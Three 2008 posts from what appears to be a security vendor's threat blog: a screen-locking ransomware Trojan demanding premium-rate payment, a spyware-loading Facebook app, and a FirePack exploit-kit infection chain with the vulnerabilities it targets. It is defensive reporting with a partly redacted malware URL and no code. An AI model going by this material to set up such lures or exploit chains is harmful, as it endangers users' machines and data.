Archive for January 4th, 2008
January 4th, 2008 by Mayee Corpin (Technical Communications)
A new Trojan locks up machines completely and makes unwitting victims fork over an amount to be able to access their systems again, Sunbelt first reported. Trend Micro detects the said ransomware Trojan as TROJ_RANSOM.B.
TrendLabs found that users could download the said malware from the site http://{BLOCKED}s-numericos.info/handlers/get.php?aid=46. Once it is on a system and has dropped its components, it renders the user incapable of using his machine and displays the following image:
The message on top of the screen reads:
ERROR: Browser Security and Antiadware Software component license exprited!
Surfing PORN, ADULT and some other kind of sites you like without this software is dangerows and threatens with infection of your computer by harmful viruses, adware, spyware, etc… You strongly need to update your software to avoid infection and losting information from your computer. Please complete procedure of software update;
Because the system’s “antiadware software” is supposedly already expired, the Trojan asks for a reactivation fee that affected users have the option of paying through SMS (short messaging service) or a call. If the user chooses the former, he/she only need send a text message to a specified number and will be charged £10, if in the UK. If, however, he/she chooses to make the call, he/she will be charged $35 in the US (or £1.50 for every minute, in the UK). Doing so, the user gets a “license code” that is the key to the “system unlock” to enable him/her to use his/her system again.
The numbers used are premium rate, according to The Register, and differ depending on which country the user is in. In the UK, the regulator PhonePayPlus has said in an interview with the aforementioned IT news site that an adult line could have been misused for this purpose.
The last we have seen of ransomware was back in August, when TROJ_GPCODE.AB and TROJ_GPCODE.AC were found to encrypt files with certain extensions, offering $150 to have the user’s files decrypted. A little earlier, in July, another ransomware detected as TSPY_KOLLAH.F also encrypted files with certain extensions, but demanded a heftier price ($300) to decrypt the files with their software. Both left behind ransom notes in README text files, offering software that could crack open the files, with set deadlines, too.
The difference with this new strain is that it takes a different tactic by actually sounding more polite, even saying the magic word “please”. Even so, it is more “cruel” in the sense that it not only targets certain files but the machine itself.
Trend Micro customers are already protected from this threat and won’t find themselves locked out of their systems.
January 4th, 2008 by Jercyl Lerin (Technical Communications)
Facebook users, take heed: Some secrets are best left undisclosed, no matter how juicy and intriguing. Those who have encountered the application within Facebook called “Secret Crush” are bound to get a surprise because the said app actually loads adware/spyware that can spread in their friendly virtual neighborhood. With close to 60 million users and still growing, the popular social networking site is once again the target of a malicious attack.
Secret Crush was quickly branded a malicious widget by the security researchers who discovered it, seeing as how it poses as a legitimate application that promises to reveal someone’s admirer(s). In reality, it loads an adware/spyware associated with Zango, which historically has been linked to adware and spyware designed to gain access to certain games, DRM-protected videos, and software. In 2006, the FBI gave it a fine of US$3 million for allowing third parties to secretly install its adware.
Secret Crush also tricks affected users into forwarding the application to their friends in Facebook, increasing the chances of the program being passed around. The best thing that can only happen when it is installed is that users come to realize that no list of their admirers will actually be revealed. But by then they would have already forwarded it to friends, who would have forwarded it to other friends, and so on. According to this post in Wired.com’s Threat Level blog, around 4% of total Facebook users have already added it, bringing the number of affected users to about a million.
Facebook’s popularity is increasingly drawing the attention of malicious users who wish to leverage on the traffic generated through its millions of users. In one case, a certain porn company allegedly used automated scripts to mine data from more than 200,000 separate proprietary Facebook Web pages, as detailed in a December 2007 PCPro news report.
Secret Crush may be just one of the early threats to test Facebook friendships. Those with Facebook accounts better pause before choosing to add it to their profiles and enjoining their contacts do the same, otherwise it can spoil the fun of social networking.
January 4th, 2008 by Paul Ferguson (Advanced Threats Researcher)
Whoa is my Jets, but not only the team, but one of their fansites, and several other unrelated Web sites, too.
It leads to a redirect in Estonia, which in turn leads to an exploit server in New York.Go figure.
Here is yet another example of criminals taking advantage of, and compromising popular Web sites to further their criminal activities.
There are several Web sites that we have detected which have the exact same embedded iFrame(s) that may surreptitiously download malware to a vulnerable computer, but this one stood out above all others — due to my devotion to the New York Jets, of course.
Ironically, they’re located in the United States, too.
A “new” server-side malware toolkit has surfaced called “FirePack”, which is a play on the wording of previous malware-service toolkits (e.g. MPack, IcePack).
And yes, they actively exploit unwary visitors — or rather, surreptitiously “piped” malicious content via iFrame.
We’ll post more on FirePack later, but in the meantime, we’re taking measures to secure our customers against these threats.
In the meantime, don’t visit newyorkfanatic(dot)com.
More later — watch this space.
Updated: 4 January 2008, 19:30 PST
As promised, we’d like to provide a little more information on this nastiness.
Here’s a basic rundown of the infection chain, as depicted in the image above.
Users surfing to a compromised website which contain a malicious embedded iFrame (or an obfuscated JavaScript iFrame), set in motion a chain of very unfortunate events.
First, the iFrame (or an obfuscated JavaScript iFrame) contains a redirect to another Web site hosting FirePack engine infection (we have also seen it loop through an intermediary redirect first), which then checks for the browser being used (MS-IE/Firefox/Opera) by the unwitting user.
The FirePack kit also hosts a lot of exploits — which include targeting specific vulnerabilities, to include (but not limited to):
- Vulnerability in Microsoft XML Core Services Allows Remote Code Execution (MS06-071)
- Yahoo Webcam vulnerability
- Microsoft Internet Explorer CreateTextRange Remote Code Execution Vulnerability (MS06-13)
- Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
- Vulnerability in Vector Markup Language Could Allow Remote Code Execution (MS07-004)
- Also, an Opera 0day 9.0-9.2 vulnerability released in October 2007!
If any of the FirePack vulnerabilities are found, this leads to vulnerable users having some very nasty malware downloaded (and executed) to their systems. This malware creates one of the infamous NTOS.exe or WSNPOEM variants in the infected system — and their purpose is but for one reason, and one reason only: information theft.
Game over.
The most important note here is one I like to make when the occasion presents itself, and that is why we (Trend Micro) have stepped up our efforts and focus on Web Threat Protection (WTP).
At the time of initial exploit, some of this new malware can be completely undetectable — and of course, the time-to-implement new detection on the malware itself can be anywhere from hours to days. With our WTP efforts, we can quickly identify threats in The Internet, classify them, and integrate them into our WTP databases, so that our customers are alerted that a Web site they might be surfing is dangerous.
Let’s be careful out there!
Paul “Fergie” Ferguson and Ivan Macalintal
Network Security Intelligence
Advanced Threats Research
